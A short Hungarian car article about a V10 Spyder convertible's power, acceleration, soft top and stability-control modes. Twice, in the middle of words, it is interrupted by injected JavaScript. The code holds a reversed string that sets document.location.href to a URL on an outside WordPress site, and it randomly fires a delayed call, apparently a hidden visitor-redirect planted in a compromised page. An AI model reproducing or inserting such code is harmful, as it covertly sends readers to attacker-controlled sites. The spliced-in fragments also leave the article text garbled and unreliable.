A tízhengeres szívómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort 610 lóerőre és 560 Nm nyomatékra hangolták, az autó 3,5 mp alatt gyorsul 100 km/órára, végsebessége 324 km/óra. A fémtetős variánsnak 3,3 mp is elég, és 325 km/óráig tart a száguldás. A vászontető akár 50 km/óra sebességnél is mozgatható, mindössze 17 másodperc alatt eltűnik. Az autó karosszériáját úgy alakítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották ki – akárcsak az összkerékhajtású Spyder-nél -, hogy közegellenállása és leszorítóereje is minél közelebb legyen a kupééhoz. A Spyder egyedi hangolású P-TCS menetstabilizáló rendszert kap, amely Strada (közúti), Sport és Corsa (verseny) állásban használható. A leggyorsabb megrendelők már idén nyáron hozzájuthatnak autójukhoz.
- Hirdetés -